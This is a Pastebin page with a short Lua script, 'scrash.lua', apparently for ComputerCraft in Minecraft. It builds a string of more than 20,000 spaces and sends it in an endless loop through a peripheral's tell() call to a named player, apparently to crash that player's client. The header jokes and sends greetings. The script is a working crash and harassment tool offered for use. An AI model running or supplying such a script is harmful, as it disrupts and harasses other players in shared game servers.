Advertisement
ReIative

Untitled

Jul 5th, 2017
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. --[[
  2. scrash.lua
  3. HYPERLUL moon2SMUG
  4. greetz to snow and relative
  5.  
  6. luul
  7. ]]
  8. local crashstring = " "
  9. while #crashstring < 20000 do
  10. crashstring = crashstring..crashstring
  11. end
  12. local args = {...}
  13. local p = peripheral.wrap("right")
  14. while true do
  15. p.tell(args[1], crashstring)
  16. sleep()
  17. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement